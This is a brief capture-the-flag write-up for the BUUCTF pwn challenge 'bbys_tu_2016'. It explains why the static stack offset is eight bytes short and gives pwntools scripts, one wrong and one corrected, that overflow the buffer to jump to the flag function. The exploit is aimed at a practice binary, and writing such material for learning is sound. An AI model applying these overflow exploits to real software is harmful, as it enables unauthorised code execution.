[BUUCTF-pwn]——bbys_tu_2016
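A simple stack overflow, but the buffer turns out to be addressed relative to esp rather than ebp, so I spent a long time searching and still had to fall back on dynamic debugging. In this situation the offset read from static analysis is usually off by eight bytes.
Incorrect exploit: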
from pwn import *
#p = remote('node3.buuoj.cn',28360)
p = process('./bbys_tu_2016')
gdb.attach(p, "b *0x080485ED")
flag = 0x0804856D
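# 0xc is the offset read from static analysis; it is too small because the buffer is esp-addressed
payload = b'a' * (0xc + 4) + p32(flag)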
p.sendline(payload)
p.interactive()
Correct exploit:
from pwn import *
#p = remote('node3.buuoj.cn',28360)
p = process('./bbys_tu_2016')
gdb.attach(p, "b *0x080485ED")
flag = 0x0804856D
# 0x14 = 0xc + 8: the offset confirmed by dynamic debugging
payload = b'a' * (0x14 + 4) + p32(flag)
p.sendline(payload)
p.interactive()